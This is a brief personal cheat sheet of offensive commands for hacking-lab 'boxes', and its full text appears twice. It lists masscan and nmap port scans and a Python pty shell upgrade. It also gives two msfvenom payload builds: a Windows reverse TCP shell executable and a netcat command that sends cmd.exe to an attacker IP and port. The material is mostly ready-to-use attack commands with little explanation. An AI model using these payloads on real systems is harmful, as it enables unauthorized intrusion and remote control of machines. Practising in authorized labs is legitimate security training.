Handy Commands

I list here commands that I often use in solving boxes.

Port Scanning

Using masscan to check for open ports:

sudo masscan -p1-65535,U:1-65535 <target-IP> --rate=1000 -e tun0

Using nmap to scan for further information on open ports:

sudo nmap -p <open-ports> -sV -sC <target-ip> -oA <output-filename>

Setting up shell

which {python} #check which python is available
python -c 'import pty;pty.spawn("/bin/bash")' #If Python2 is available
python3 - c 'import pty;pty.spawn("/bin/bash")' #IF Python3 is available

MSFvenom

windows/shell/reverse_tcp:

msfvenom -p windows/shell/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> EXITFUNC=thread -f exe -a x86 --platform windows > exploit.exe

cmdexec - netcat:

msfvenom -p windows/exec cmd='\\<target-ip>\smb\nc.exe <attacker-ip> <attacker-port> -e cmd.exe' EXITFUNC=thread -f exe -a x86 --platform windows > exec-exploit.exe

PreviousCOMING SOON

Last updated 4 years ago

Was this helpful?

Handy Commands

I list here commands that I often use in solving boxes.

Port Scanning

Using masscan to check for open ports:

sudo masscan -p1-65535,U:1-65535 <target-IP> --rate=1000 -e tun0

Using nmap to scan for further information on open ports:

sudo nmap -p <open-ports> -sV -sC <target-ip> -oA <output-filename>

Setting up shell

which {python} #check which python is available
python -c 'import pty;pty.spawn("/bin/bash")' #If Python2 is available
python3 - c 'import pty;pty.spawn("/bin/bash")' #IF Python3 is available

MSFvenom

windows/shell/reverse_tcp:

msfvenom -p windows/shell/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> EXITFUNC=thread -f exe -a x86 --platform windows > exploit.exe

cmdexec - netcat:

msfvenom -p windows/exec cmd='\\<target-ip>\smb\nc.exe <attacker-ip> <attacker-port> -e cmd.exe' EXITFUNC=thread -f exe -a x86 --platform windows > exec-exploit.exe

PreviousCOMING SOON

Last updated 4 years ago

Was this helpful?